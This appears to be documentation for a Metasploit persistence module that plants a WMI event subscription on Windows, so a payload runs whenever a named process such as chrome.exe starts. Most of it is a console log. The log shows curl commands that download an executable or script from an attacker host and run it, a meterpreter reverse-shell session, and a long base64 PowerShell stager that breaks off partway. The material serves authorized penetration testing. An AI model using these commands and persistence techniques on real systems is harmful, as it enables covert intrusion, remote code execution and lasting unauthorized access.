## Vulnerable Application

This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter
that triggers the payload when the specified process is started.

Additionally a custom command can be specified to run once the trigger is
activated using the advanced option CustomPsCommand. This module requires administrator level privileges as well as a
high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.

Many built-in apps in Windows 10/11 launch via a modern UWP app (Win32Bridge.Server.exe or
ApplicationFrameHost.exe hosts it) — not the legacy binary (like calc.exe). calc.exe can be triggered
from command line still, but the gui link will not work.

Duplicate `CLASSNAME`s will not overwrite, so if the env isn't cleaned up before
re-exploitation, the exploitation will fail.

Tested:
- chrome.exe (several shells at once)
- calc.exe (only from command line calc.exe or calc)
- msedge.exe (several shells at once)
- cmd.exe

## Verification Steps

1. Start msfconsole
2. Get a shell on Windows
3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_process`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell when the application starts.

## Options

### PROCESS_TRIGGER

The process name to trigger the payload. Default: `chrome.exe`

### CLASSNAME

WMI event class name. Default: `UPDATER`

## Scenarios

### Windows 10 1909 (10.0 Build 18363)

Original Shell

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49758) at 2025-11-22 11:28:54 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
gComputer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
eArchitecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```

Persistence

```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_process 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set session 1
session => 1
msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > [*] Powershell command length: 6851
[-] Compressed size: 14136
[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit.
[+] Launching stager:
[+]  - Bytes remaining: 14136
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAHsAMQB9AEEANgBXAFoAUwAzAGMAYQBXADcASwBFAC8AMAByAFAAMwBIAGUAdABIAGkAQgBMADgAdgBVADUAcwAwAHsAMgB9AFUARAB5AEgAQQBCAFIAewAyACcAKwAnAH0AWQBlAHYAVwBBADEAeQAzADcASQBBAGsAZgB5AFYASgBKACsAdgBVAGQAWAArAHcAewAxAH0AYQBYADQAMQBZAHsAMgB9AG0ASwB2AGYATQBSAEcAUgBtAFoALwBEAHUANwBmAC8ANwA1AGMATABpAC8AMgA5ACcAKwAnADMALwAvAHMAKwBmAGYAMAA1ADIAdgB6ACsAOABNAFYAcwA5AC8ARgB5AHQAYgAzAGYALwAvAE4AVAB7ADIAfQAzADkAbQBQAHkAWABXAGUAUABjAHoAdgBQAC8AMwByACcAKwAnADAAMwBVAFoAaAAyAGcALwB4AHEAWgBxAC8AaABYAGQAWABxAHoAeQBaAGgAWABkAFAAQgBaAGwAOAB6AEUANgAnACsAJwBYADIATgBSAE4AUgArAGkAMwBZAGgAUgBHAFYAKwBpAE0ANABoAE4AMgBiAHkATgBUAGgAYgBiADAAJwArACcATwB0AFYARwBmADEAbwBqAHEASgBUAHgATABhAEsAMwA1AEYAJwArACcAOQA1AFgAJwArACcAdAAvADgANwArACsAMQA0AGkAcgBpAEsASgBxAFgAawBaADMAawBKADcAdgBOAE8ASwBtAGIARgA3AHoAbgBGADYAbgAzAEgATQA4AGIANQAwADMASgAvADUAZQAzAHQAegB6AHUAcwBHAHUANwB7ADEAfQBLAFcAZQBmAE0AOAByAGgAbwB4AHIAWgBvAC8AbwAzAFAAZwAvADcALwA0AFgAaQAvADQALwBoADYANwBHAHoAeQAvAHoAdQBNAHAAcwByADIAZQA0ADMAVQB7ADIAfQA2ADYAcgA1AE8ANwBxAFIAegB0AGYAOQBlAHUANABYAC8AcQB4AEwAUAB0AC8ARQByAHQAVAAvAFgAZAB2AFgAdwBHACsAZAArAHcAUAA3ACsAdgBIAC8AdQBiAGYAQgBjADcAKwA1AFIALwBkAGUAUgB0AHQAKwB2ADkAWgArAC8AUwBaAGUATgA5AEYAYwA4AC8ANAB1AGIANwA1AHgAbgBwACsALwB1AG8AaQA4AGEAagA1AEgANQB5AEsAMgB0AHIAZgBIADkANwBiAFIATwBpAGoAdQB6AHsAMgB9ADcALwAyADUAKwBzAHgAegBsAHYAbgBEAGMAcwBvAC8ARgArAC8AbAA1ACsATgBlADkAVABQAG0AVAAvADEAUwBZAG0AbwBjAC8AbAA5AHkAUgB2AE4AdQB1ADgAUABHAEQAbgBqAEgAeAAyAEgAMgBPAHsAMgB9AE4ALwArAEkATABPAE8AYwAxADIAZwBmADkATAA1AGUAcgAvAHoAYwBsAEgAcwBtAGwAZQA1AHQARABlAEsAbQBVAGoANwBhAFoAZQB5AHEAZQBJAGwAdQBnAC8ATwBHAGsAUwAwAGkAegA0AG4AZgBQAG8AcQA4ACcAKwAnACsAUgAxAGMAegBFAHIAbAByAHgAMgBSAFkAMQBkAFcAeABIAFUAVgBEADkAaQBoADUAMwA1AEcAZQA0AC8AOQBzADIAZwByAHoAawBFADgASAAyAFcAMwA3AG0AcwB0AFkAaABYAE4ASgArAEkAMQBLAFgAVgBQAFoAcgA5AC8AWQBIAGQAUgBSAFIAVwB0AEkAbABiAE8ANAB3AEcALwBGADcAeQAvAGkAMwBpAHUANwBSAHAARwBlADQARwBkAHkANwBoADYANQBOAHoAZgB0AFIAMgAvADgARwBmAGsAZgB7ADEAfQAxAGkAVwB1AHEANQBUAGcAVwArADkAdABHAHkALwAxAFcAMABpAFIAOQB4AHoAdgBEADcAZwB1AGUARwBlAFoAJwArACcAeQBCAHcAMABYAEoAdgBXAFcATQB5AFgATgByAHcAKwBjAHYAeABFAFUANABPAE8AZAArADUAVwB2AEsALwA5AHMAeQB6AHIARgAvAEYATQAxAHYAMgBEAEcATwArAE0AegByAGwAUABOADEAbgB1ADYALwA1AEwAbABKADYATgA0AHIAMQA5AGYAMwA2AEIAYgBrAFYALwBoAGUAZwBJADgAWAA4AGoAaQAnACsAJwBOAGMATAAzAHAALwBUAFAAcwBNADkANwBrADkAeABKADcAVwByADMAWQA1AEkAcQBQAHYAagA4AGcARAByAEoAcgB7ADIAfQBGAHgAbAAxADcARABpACsAVQAwAE0AUwBwADAAcgBPAC8AcQBWADQAdABQAEoAZQBlADQATQBPADQAYQA1ADgATgBrAGkAdgAzAHcAKwBJAE4ALwBHAGwAZQA3ADkAUwBUAHoAawA1AHgAbgA1ADYAVgBkAHgAegA3AGsAcgBQAHQAYwA5AGMALwB6AHcAOAAzAEgASgBlAFgAcgB1AEIAWAB1AE4AbgAyAFQAbgBUACsASgByAG4ATABZAGMAagB3AFAAZgBtADUAWABLAHkALwBFADgAMwAnACsAJwBTAE8ALwBjAC8AdwBmAGcASwBOAE8AagAvAHQASAAzAEsATgA4AHYAZgBLADkAWABZAEEAYgAxADgAVwByAGUAewAyAH0ARwA3AFYAVwBmAEsAMQA0AFgAagBFAE0AMwBQADEASwBIAE8AeQBTAEkAcgBZAHgAagBLAHMAMwBBADQAQgBXAGUASwA3AHoAagBYADUAOABMAFQASwBCAHsAMgB9AFAAKwBhAFAANABEAGsANwAzAFkAegBlAHYAcwB1AHUANgAwAG4ATgA2AFgAcgBnADEAYgBvAGIAdwBuAE8ANQBSAFgATQA4ACcAKwAnAGkAVQA3AHkAewAxAH0ATwBPADEAbABWAC8ATABYAE8AQgBBAHYANwBNAHIARQBSAHgAdgB5AEoAYgB1AFgAWgBmAE0ATwBQADEAUgBuAFMAMQA2ADMANABEAHEAcgA4AE8AOABIADgAWgBmADkAVAArAFIAcgBXAEkAWABxAFUALwB5AFMASwAnACsAJwA2AC8AdABQAEYAWgBsADQAbABQADUATwA2AEIAZQA1AE0AYwBjAFAAewAxAH0AcwAvAGoALwBZACcAKwAnAFAAZgBLAFUANgBYAGgAQgBuADIAWABOAEIAMwBGAHsAMgB9AFgAbAB6AFgAJwArACcAdQBaAGoAdwAvAHAAMAA2AEUAVgA5AGwAZgBnAHsAMQB9AFAAbAAzAGYALwByAEgAdABzAC8ASgBnADcAZwBvADUAUwAvAG4ARgBNADEALwB4AGQANwAvAGkAOQB2ADkAdgBEAC8AeAB2AFcANwBUADUALwByAC8AVgBuAG8AZgBYAHsAMQB9AEEAdgBiAEwAagBXAEsAOAA3AC8ASgBUAGQASQAvAGcAdwBlACsAVAAxAE8ALwB4AGkASAB1AGcAUwBYAC8AbQBqAGYAewAxAH0AbgAvAEsAKwBxADkAewAxAH0ASAAxAGYAOQBxADMASgB2ACsATABWAGQAeAB3AEwANABwAFUAUgB6ADMAawBlAGIANwBYAC8AdAA1AHgANwB7ADIAfQAvAHkAVgBsADYASAB2AHoANwBCAGoAewAyAH0ARAB5AEYAOQAzAFAAcwBNADQANgBGAFcAOQAyADcAdABQAC8AUgB2AE8ATAAvAE4AWAB6AGMAYwBwAHcAdQBUADMAbAB1AGIAMQBKAGQAMABEADkANABuAC8AbwAyAHIANQBzAEgATAByAEIAcgBtADgAdAB2ADUAVQBmADQAZgBNAE0AUAB4AFgAMAB7ADIAfQByAGMAQQBlADIAeQBjACsAeQBIAHcATwBmAEgARQA2AHQANQBmADYAawBOADcAZgBnAEYAdAA5ADcAOABoAC8AcwB2AHYAcwBuAFQAOAB2ADUASgA5AHcAcgB0AGMAQgBmAE4AWQBwAHkAVgBzAEQAdgBoAHUAQQBHACsARgBvAFIAUAB6AEYAcwB6ACcAKwAnAHYANABWAGQAJwArACcAOQBmAEUANABjAFUALwB4AHUAKwBaAHgANQB7ADIAfQB2AFcAKwB3AFUANwBnAFoAdwBpAHUAYwBaADkANABQAC8ARgA2ADUAMwA5AFoAOABJAFgAdABYADEATQBIAEEAZgBVAGEANABNAEUANQA3AEoALwB0AGMAWgA1ADEAQgAnACsAJwArAGwAegAyAEsAdwA4AEYAMwB6AHYAZQBMAHoANwA5AFoAJwArACcAcgA3ADAAUABZAGYAVAArAHcAdgA2AHYAdgBwAFgAewAyAH0AUgA0ADYANABBAG8AKwAzADMAewAxAH0AKwA2ADIAYwBOAEgAMwBTAE4AagAxAGYAcwBVAHIAOQAvAGQAbAAwAGIALwA4ADcAcgBiAC8ASQA3AG8AegA3AEUALwAvAEwAegBCAFgAegBvADgAeAB3ACsAdQBzAEYAdQB4AFYAMQAyAHQAYwBuAFQAdgBPAFMAOABBADMAaAArADQAVgBWADEAUABhAGoAMQB4AHoAZgA2AHcAdwBqACsANgBtAHsAMgB9AEoAZgA2ADIAaQA5AHEATwBuADUAKwBnAGIAZQAvAHIARABKAGMALwByAGYATwBkAG4AbABjAFAAagA1AHMAOQBYACsAcwBpAGMAUABtAFMAZQBoAGoAYwBIADgASABSAFIAMQA5AEUAWgBkAHEAMwBmACsAZQBFADEANgBSAGYAWgBUAFIAOABBADUAKwBwAHYAeQB2AE8AZAArAHgAVgAyAFoAZQBhAFgATQAzAHsAMQB9AGwAKwBtAC8AewAyAH0AcAB4AGYASABmAGsAMwAvAE4AZgA3AGgANgBhAC8AWQAzAHcARwB2AHkAcQA5ADUAZQBrAEEALwBVAHoANABWAHQAMgAvAG0AYgBmAG8AWAA1ADQAVABzADEAMwBNAGIAMQAwADEARgB2AHEAKwBvAGEAOQAzAC8AQgBUADkAbQA4AEYALwBxAHUAOAA3AFAAdQBKAFIALwByAGkALwB3AHQAewAyAH0ARQAzAEsALwB3AGMARwB6ADgAOQA3AEwATQB1AG0ATQBBAEQAcQB0AHMAYgA5AEUANgB5ADQANQB2AHoARgB3AG0AUAA1AHYAMgBPACsAKwA2AFMAZgBNAHoAZwBtADYANQA0AEYAZgA3AFAARgBxAG4AdQAyAC8AewAxAH0AVQArAGsAQQBIAEgAdAB7ADEAfQByADgAcgA0AHkARABoADYAeAA4AHcALwBpAHQAcQBWAHYAeQBZADYAagBmAGYAMABhAFYANwBzADgAOABhAFgAOQBVAEQAMgBJAEoAegBQAGkAcwB5AE8AZQA4AG0AOABGAHYAKwBnACsAeABlACcAKwAnAE0AYwB1ADIAYgB3AGoAagA3AHYAbQB6AGMATAArAHUANwBkAFMAVQBlAGkAZwAwAHIAeAB7ADIAfQBkAEkARgBaADgAVAB4AGgAagB3AEoAdAA2AG4AUABEAGUAZwBEADMALwBCAHoARABqADUAUwB2AHoAMwBuAG4AaQBtAHYAOABtAFAAcwAvAHQAWABnAHYAaABWADkAYQAxAHIAcgBwADcAWAA5AHIAZgBNAG8AdgAzAGYAVwBVADMAdgBxADQAcwBKADgAVQBxAGEANABxAGIAOABWADUATwBHAEcAdgB0AHgAMgB2AEoAOQBxAHYAZgBBAEEASABqAGYAWQBxADcAcAAxAC8AbgBWAE8AdwBiADIAbgBQAGsAewAyAH0AZQA0AEEAWAAwAHMAcwA1AFgAUABHAGIAMABSAGYASQBNAGIAaABMAFAANQBlAGkAUgBxAGYAVQAyAGUAQQB2AHIAeQBsAEcAZQAnACsAJwBlAEYAQgArADEAegB6AE8AKwB3AGYATwBkADUAMgBOAFgAUwA4AGwALwB3ACsAbwAyADcAWAAxAG0AUABYAFYAQQByAHcASwBoAHkALwBXAEsANQBGADAAdwBzADAANwAzAGgAVwBYAGoARAA3AGYAZwBKAGMAbgAxAHUALwBLAHsAMgB9ADAANgArADkAdABUADEAWgA4ADQAZABsAEwAeABLAG4AMQBmAHcAZwBlAHYAaAB7ADIAfQBGADcANgA1AEUAdgA4AE0AagBkAHUATgArAGkAZwBCACsASQAyAE4ANQArAFcAMQBOAG0ATgArADIAMQA5AHoAdAB4ADYAYgBVAEcAYwBoACsANQBmADgASgBQAGkATwBZAG0ARQBsAHoANQA5AFUAMwBoAFgAZgB0AHIAVQA1AFoAeQA2ADAARAAzAHsAMQB9AGoALwB2AEYARgByADIASgBiAHMAcQBwAG0AdwBQAHgAdAB0ADQANgA5AFMAdgBpAEsASAAyAGcAJwArACcATwBJADAAVABQAHUAQQBGADkAQgBpADgAUgBKADkAVQBQAG8AVwBUAHsAMQB9AFgAWgBtADQAQQBFAGUANgBJAEgAVABPAC8ATABqAHYAawBSAGYASwAnACsAJwBaAFUASAArAFMAVQAvADcAOABtAFgAOAB0ADEAegAzADgAcABUAFAANwA1AHgAMwA4AHYAaAByAHgAeQA3AGgAdQA1AFgANABCAGoALwA2AGIAZgB7ADEAfQBiAC8AdABkAG4AeABtAEgANQBMADMAdQBoAHcAdAA0AFUAZQAnACsAJwBlAHQAMwAnACsAJwBTAC8AewAyAH0AagBlAGgARgA2ADQAOQByADEAeABQADUAcAA1AC8ARABHADgAcgBuACcAKwAnAEcAUAB0AGEALwBsADcAUABQAEYAcwBlADgANQBmAHEAVwAvAEUAWgBjAC8ALwB7ADIAfQAvAGIAZQBvAGQAZQBiAFgAbAB7ADEAfQBmADYAQQBmADUAawB4AHMAbQBkACsAMABrAHUASABTAEUANwAxAEsAOAB2AGEAdgAxAHEAMwBHAC8AQQByAGUAcAAxAFQAcgA5AHUAVwBaACsAOAA0AFkALwBpADcATAAnACsAJwBsAGoAagBuADEAZABuAC8AZABFAEgAcwBmAGsAZwB6AHIARgBMAHYAcAByACsAWQBGAEgAVgBhAGUASwBVAHoALwAxAGUAKwB6AEsAbwBuAEQAOQBGAGUAaQBBAFYALwBLAHcAcwBaADgATABlAEcAVABxAHYAbABvAG0AMwBTAGwAOQBkAGsALwArAHIAewAyAH0AKwA3ADQARABYAE4AVwBhAHIAagBOAHMAOABYAEoAWABXAHsAMgB9AG8AVwBkAHUAeQBmAGYAYQB1AGkAOABUAHYAcwBWAEQAKwBuADgARAAvADMAZABzAFgANABQAHYAVwA5ADkAbgBXAGUASgB6ACsAQgBvAGUAVQBwADcATgBxAC8AQQA1AGYAUwBTAHoANwB1AHoAVQBPAHUAZQBKAGYAQgBUADAATQA3ADAALwBNAGYANABEAHYARAA3AEIAawAyAHYAYgAxAGMATwBlADEAOQBTAHYAYQB6ADUARQBCAHkAVABkADkAOABJAGMATQAwAFAAMwBkAFoAawBYAFQAMwBWADgAegBiADAAcgA4AHEATgB6AGgAOAB3AFgAWABlAHQASQA2ADkANABSAE8AcgBSAHQAMwByADgARwBOADIAdgA4AGMATgA4AEYATgArAGEAYgB6AEgAaQAyAGoAcwA4AFMANwBwAGcAMwA0AEcAWAAxADMAUwAxADkAVgAnACsAJwB2AG4AcgArAC8ANgBEACsAQgBVADkAdQBlAGYAYwBNAFgAVQArAGcAZwBmAFUAWAAzAFQALwBGAC8AaAB2AGEARgAxAHEAZgBIADgAbgBUAGcAUAByADYASAAzAFMAZwBTAGsAUABUADkAVABmAGgATAA2AHQAYwA5AGYAdwBaAHQAZAA5AHgALwBFAGQATwBrAC8AVwBGADYANAB6ADQAZQA4AEYAKwA0ADkAOQBZAE8AbgA4AEYAdAB6ADMAcwA2ADYAJwArACcAbgBIAEYAdwB0AHEANQByAC8AQQAxADEAaABmAGYAbwBMAG4ASwB6AHkAcABFADkAVwAyAEsARgA3AGkAeQByAGwAVgBUAHIAaQB7ADEAfQAvAGQAdgBYAEwAZgAwAGIAZQBvAHQAbwA3ACsALwBFAFIALwB4AFMAZABQADYAZwBuADcAYwB4AG4ALwAxAFQALwBrACcAKwAnADUAewAyAH0AaQBkAG4AUgA1ADIAVgBnACsAdQAvAGkAZQBNAE0AUABMAFcAdABZADYALwByAHUAQgBYAFcAbABmAEQATwBrAGEAOQBWAEYANAByAHoARAArAHQAbwA3AHkASAAyADYASwBVAHoAOQAyAEgAMABtAGYAbABQAHUATgBmADMAaABZAE8ALwBYAFgAZgBFAFcAMwBXADQAWgBJADcASgA0AEIAUAAxADEANwBiAG4AbgBXAC8ANABOADQAZQAnACsAJwBuAHEAYgBzAHEANgBaAEgAWgB7ADEAfQBUAGUAbgB1AHYAbgBEAGMAeQBkADUAdABVADcAQgBmAC8AUABxAHEALwBVAGgAZgBtAFgAZQBUACsAVAA0AE4AeQB7ADIAfQArAGIAZQAnACsAJwB1AHsAMgB9AFcAKwA1AGIARQBoAGYAaABmAHcAYQBlADAAaAB4AG4ASABoAGEAZgB2AEIAawB2ADgATAAzAGkAdgB3AEUAdgBiAGMAOQBSAHQAKwBSAC8AUwB2ADIAMwBEADQAawBQAE8AcAA2AFgAcgBZAE0AbQByAHYATQBCACsAWABvAG0AdgAwAGUAZQBWAFoAegA3ADEAZwBIAFcAYwBYAHQAMABoAFAAdgBIAEcASgAyAFoAbQBSAGUALwBrAEkAOABWAGMAYwB1ADgATgA3AHEAdAA1ADAAVABqADEAWABZAHcATgAxAG0AbgBEAEoASgBlADYASABqAE8ALwBrAHgAOQBUAGEAeQBiADAARQBmAHsAMQB9AHEALwB5ADIALwB1AHEAdwBaADgAQQArADYANgBYAFgAZQBvADYAdQBUAG4AVgAzAGYAQgBVAGUAdABzAHgANQBTAGYAOABZADcAegB2AHkASwBEAHUAVwA1AGEAbAAvAFAAaABEAEgAcQBlAGYANwB6AFUAawB2AEwAMgBzAGQATQAzAE4AZAAxAHoAcQBuAFkANQAxADgAagBsADAARgBjAHkAcgA0AEwAaABPAGYASwA4ADQASAA0AHIASQBBAC8AKwBvAG4AcQB6AEwAbABaAHsAMgB9ADQAKwAyAHQANwBuAE4ATQBsAC8AMwAzADUAdQB3AE8ATgBmADQASABHAEwAbgBrADgANAB6AFkAbgBMAEEAbgAzAFUAOABwAHoAdwBqAGYAdgA3ADgASQA3AGkATgBLAGMAKwA1AFAAYwBTAG4ATQBMAFQAZQBjAHIAcgBCAEYANAAvADYAaQAvAGQAbgAyAFAAbgBsAFgAWABlAEEAVAB1AFcAZQBlAHEAYgBSADcAOQBXAHIAaAB2AGoASgAwAC8ANgBTAGoAagBXACcAKwAnADgAeQB2ADAAbgB1AEkANQBwAGoAKwBKAHoANABmAGcAUAArADAAVABWAHIAeQAvAFoAQgArAGkAUABwAGUANwByADUAawBmAEoAdABiAFQAOQBQAEUATwB1AEUAOQA5AHsAMgB9ADMAMgByAGUAYgBLAG4AVgBlAHUAbQBOAE4AZQBsAFAARABFAGYAewAxAH0AMABmAHUAUAB4ADMAcgBpACcAKwAnAFUAYgBkADEAOABiAGcAUgBIAEUAYwBjADkAKwB1ADEAaAArAEoAegB4AGIAcwBrADYAcQBQAGUANAB7ADIAfQBoAGUAawBhAHYAdQBmAG4AYgArADUANgBSAGQAWgA3ADEAVgBvAC8AKwA4AHAAawA2ADIATQBKAFAANAB1AHMAKwB2AEUATABlADQAMABOAGYAbwBpADQAcQArAGEARwA2AG4AVQBYAFMAdQBZAFgAMwBaAG8ANwBQAEgARABzAG0AMwB1AGQAJwArACcAWgByADUAdwA1AG4AcABIAG0AZwBIAG0AdAAwADEAWgBsADQAcwBkADEASgBOADIAegBKAHUALwAwAFIAZgBPAEEAegA4AHUAeABiADgAdAA4AEQAMgA2AEkAaAArADcAYgBNAFAALwBTAFAANgB6AGIAQQByAHMAYQA1AE8AUABHAGUAMQBIADIARgBIAHIAdABPAEoAOQBOADkAKwA5AGEAVgA4ADEAZABCADkAWQBkAHgANwA2ADMAdAB6ADcAMQBIAEYASwBpAGEAegA5AFQAOQAyAFAANgBoAC8AZABXADgATABMAG4ATQBPACcAKwAnAC8AegBwAHYAQQBqAGUAYgBWAHUAewAxAH0AdQBLADMAdwAnACsAJwBCAC8AdgBLAGQAaQBQAFIAZAByAEQARABNAEcAcAA0AHUAUABQADIAWQA5AFMAUgAyADMAdgAxADgANwBCAC8AZAB4AHoAUwBCAHsAMQB9AG4ARQBlAC8AMwA2AFoAZgAwAGYAZQBxAHcANQBUAGcATgA3AHsAMQB9AGQAeABhAEgAawB1AE8AYgBjAHUAOQAvACsARABEADMAaABNADkAYgBUAEYAVAB1AEwAcgArAFQAYgBIAG4AdwBQAFAAVABUADEAMwBsAHYAeAAvAFMAegA2AG0AbgBtAE8AcQA1AEoAZgBPAEwAOQBqAGoANgBkAFgANABiAFgAdgB2AFYATQBHAC8AaABmAHQAagBqAGMATwBrAEYAKwB0ADQAZwBTAGYAegBYAGIALwBlADQAMQB4AGIAZAA3AFAASAArAGoAewAxAH0AMwBMAE4AZwBYAHAAUAAyAHUAZABkAGkAaQBTAHYAdQB1AE4AWABQAHsAMQB9ADEAVwBQAHEAbwB4ADMAcgA1AHsAMQB9AGYAMABvAHUAeAArAFQAcwArAEgAOQAwAGMAcgA5AGcAZgBvAFAAZgBEAFkASwBkAFAAZQBWAFgAaABjADAALwAvAFYAdAA1AGIAcwBBADQANAA4AHAAWABQAFYARAAwAGIANABQADcAQQArAHkATwBnAGoARgAvAHoAZgByADkATAArAFUAKwBmAGQANABPAGUARQB2AFYAcQByAGwAMwBEAGIANwBpAFUAOQAzAEgAWABmAHYARABmAGUAMwBWAGYAWQBiADYASQBIAG8AdAAnACsAJwA3AHoANQBlAHsAMQB9ADQAcwBOADMARwBxAGUAZQBzAFMAMwBTACcAKwAnAFUANwBKAC8AQgArADIAbABmAFUAdgBEAGMATABNADAAUABjAFYARwAvAFcAcwBmADMAZgBjADkAeAB2ADEARwB7ADEAfQB4ADgALwAxADMAbgB7ADEAfQBPAEgAWgBNAHkANwBhAFUASwA4AHMAbgBuAGUAZABvAEQARABTAFAAcABxAFcAMgBaAGQATQBHAGsALwBJAEIAYgB4AFcAbABJAFAANABmAFgAZwB2ADUAaAAvAFcAZQArADIAdABSADcAdAAyAE8AZgBXAFkATQBIADgAJwArACcAZQB7ADIAfQBtAGsAcgA2AFoAZQB7ADIAfQA1ADEAZgBYADIAeAA3AGkATgAvAEwAZQArADEAOQA2AG0AdgBFAGYAYwBHAGUARAA3ACsAZgBuAEQARgA5ADUAWQArAHYANQBmADIAaQB0ADAAcwB6AGIAMQBwAGoAcwB2AHEAZQBTAE8AMwBIAGsAUABmAHQAagAyADMAbgB7ADEAfQBXADcAMAA3ADAAcgA5AGcAWgBwAFgAOQBkAGoAagBwAHAAVwBxAGEAOAB1ADYANwBrAHcAcAA1ACsAdwBsAC8AewAxAH0AOABVAHIARAAvADgAagB5ADQAWQAzADYAewAyAH0AZgBhAHEASABYACsAWQByACsAbwBWAHcAUAA2AFcAdQBzAHYAZQA1AFkAMgBCAGMAZQBYACsAYwAyAFQALwB2AEYAYgB3AG4AdgAvAE0AZQBwAEUAcAB6ADcAOQB3ADQAcQBwAGgAcgBQAHQAYwA2ADQATAB0ADEAdgAvAGsAOQBnAHkAOABYADkASQAyAGwANQA5AEUARAAvAE4ATwAwAFQAaQB2AFQAZgBuAEoASABuAGMAaQBmAEUAWABZAG0AMwBXAGQAOQBlAFYATwBsACsAZABGADcASgBmAGEASAA1AGcAZgBtAEEALwBVAHIAZgBUADUAaQB6ADkAMwBhAHAAMwAxACcAKwAnAGcAMQAzAHYAOQBaACsAdABCADUAcgBkAFQAMwB5ADMAaABoAGEAWABuAGEAZgBaAHYAbgB0ACsAWQBXADgAMABMAGYAZQBPAHEAUwB2AHUAdgBPAGYAWQBwAEQANQBNADgANgBZAGEAYwBQAHQAeABaAHAASAAxAGUAbABpAGMAOQBrAFgAVABWAEwAYgB3AHoANABOADYAVQBSAC8ATgBvAHoAdAB3AGgAWABJACsAOQBQADcARQArAHEAcgBoAC8AewAxAH0AeQAvAEkANwBxAEgAbgArAG8AJwArACcAcQA2AE8AcQB2ADEAegB3AFcAZgA1AC8AJwArACcAUwBaAGwAdgBGAHoAegA3AGsAVAB4ADIASAAnACsAJwBEAHYAZgB1ADYATAAxAHoAVgArAFIANQB4AHoAcwBKADUALwBGAHIAcgBsAEEAdwArAEcAWgBsAG4AJwArACcAMABWAG4AVQB1AGYAdABhAGkAWgA0ADgANABKAGYANwBuAHUASwAvAGMALwAzAEEAYgAvAFQAUABmAGQATABKAEwAYwA5AHoASAArAFkAVwA4ADgAdgBGAGUAOQA5ADAAdgBmAFoAcgBPADYANAA5AFYAMQBCAC8AMQBNAHYANwAvAHYAWQBuAHYASABXAHMAagB6AEYANwBVAE8AVgBqADYAVABtAHcAawBmAFkAagA3AE8AMQBMADYAagBuAHEATwBVAEQANABjAGYAMAB6AHAAegBPAHYARABkAGoAcgB2AFkARwByAGcAcgAwAGQAKwBLAC8AJwArACcANQBZAGMAYgBuADQAdABPAEYANgA2AEUAQQBMADMAMwBiAGoAYQA1AHIAKwBmAGUATQBTADMAaQBzAGUATgA5AEQAWABOAGIAegA3AFkAagA3AFYAcABIAG0AaABLAEYAMQBxAE8AYwA5ADkANQBzAFoAKwBqAEgAdAAnACsAJwBnAFkAYgAwAHMAeAB2ADIAZgBFAG4AUABuAE4AWAA3AFkATgBmADUAMABuAHoAbgAzADgATQBlAC8AYgB2AEwAdQAxADUANwBOAG4ANgA5AD